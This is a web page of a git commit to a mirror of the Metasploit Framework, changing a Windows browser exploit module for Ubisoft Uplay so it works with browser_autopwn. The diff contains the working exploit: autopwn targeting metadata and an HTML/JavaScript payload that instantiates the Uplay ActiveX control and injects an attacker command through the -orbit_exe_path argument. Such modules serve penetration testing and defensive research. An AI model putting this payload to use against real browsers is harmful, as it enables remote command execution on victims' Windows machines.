infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed to work with browser_autopwn

unstable
Meatballs1 2012-07-30 16:43:21 +01:00
parent 066020e572
commit f298dbbd04
1 changed files with 107 additions and 99 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb
View File

@ -19,11 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE,
:javascript => true,
:rank => NormalRanking,
:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}", #Asume this is so javascript can check the ActiveX is available?
:method => "DownloadImageFileURL", #??
:rank => NormalRanking
#:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}" # Does not get registered in IE properly?
})
def initialize(info = {})
@ -90,7 +88,17 @@ class Metasploit3 < Msf::Exploit::Remote
classid = "clsid:1c492e6a-2803-5ed7-83e1-1b1d4d41eb39"
type = "application/x-uplaypc" # Unused but alternative to classid
content = "<html><body><script>x = document.createElement('OBJECT');x.classid='#{classid}';document.body.appendChild(x);x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');</script></body></html>"
content = %Q|
<html>
<body>
<script>
x = document.createElement('OBJECT');
x.classid='#{classid}';document.body.appendChild(x);
x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play');
</script>
</body>
</html>
|
print_status("Sending exploit HTML")
send_response_html(cli, content)